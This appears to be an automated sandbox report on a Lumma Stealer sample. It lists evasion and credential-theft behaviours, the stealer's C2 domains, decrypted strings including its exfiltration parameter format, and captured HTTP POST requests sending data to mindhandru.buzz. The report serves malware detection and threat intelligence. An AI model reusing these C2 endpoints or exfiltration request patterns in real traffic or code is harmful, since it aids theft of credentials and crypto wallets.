
Windows Analysis Report
XM6cn2uNux.exe

Overview

General Information

Sample name: XM6cn2uNux.exe (renamed because the original name is a hash value)
Original sample name: a3f5c08ac61228829905f46d3e4e9dc5.exe
Analysis ID: 1580875
MD5: a3f5c08ac61228829905f46d3e4e9dc5
SHA1: f412251760048ed7d1f078fa3de654fe8c52262c
SHA256: 2791569a37e501f3c7b0c74aa2a75adaf30a07852c13e0f9d0fc658a948fe8c7
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • XM6cn2uNux.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\XM6cn2uNux.exe" MD5: A3F5C08AC61228829905F46D3E4E9DC5)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "mindhandru.buzz", "appliacnesot.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T12:45:12.336203+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:16.458009+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:19.228606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49736 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:28.698182+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49760 | 172.67.165.185 | 443 | TCP
2024-12-26T12:46:12.433761+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49860 | 172.67.165.185 | 443 | TCP
2024-12-26T12:47:24.388227+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 50006 | 172.67.165.185 | 443 | TCP
2024-12-26T12:47:26.599901+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 50007 | 172.67.165.185 | 443 | TCP
2024-12-26T12:47:28.145167+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 50008 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:15.142184+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:17.258145+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:15.142184+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:17.258145+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP
2024-12-26T12:45:27.250374+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49736 | 172.67.165.185 | 443 | TCP
2024-12-26T12:46:10.836888+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49760 | 172.67.165.185 | 443 | TCP
2024-12-26T12:47:22.368235+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49860 | 172.67.165.185 | 443 | TCP


AV Detection

Source: XM6cn2uNux.exe | Avira: detected
Source: https://mindhandru.buzz:443/api | Avira URL Cloud: Label: malware
Source: XM6cn2uNux.exe.5448.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "mindhandru.buzz", "appliacnesot.buzz"], "Build id": "PsFKDg--pablo"}
Source: XM6cn2uNux.exe | Virustotal: Detection: 53%
Source: XM6cn2uNux.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: XM6cn2uNux.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: XM6cn2uNux.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50008 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49720 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49736 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49760 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49860 -> 172.67.165.185:443
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49760 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49860 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3C0DBROOY
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12805
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=GGOM7NCR28HL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15069
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=21HZVP8BZL9GZS5N5L
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19963
    Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: XM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3498179672.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493218176.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493013249.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/
Source: XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/.$
Source: XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3498179672.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api
Source: XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api$M
Source: XM6cn2uNux.exe, 00000000.00000003.3496261170.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3496047879.00000000011F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apijs
Source: XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apin
Source: XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/d
Source: XM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550214215.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543162097.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557552788.0000000001252000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/s4
Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz:443/api
Source: XM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz:443/apiF
Source: XM6cn2uNux.exe, 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520973311.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz:443/apily
Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
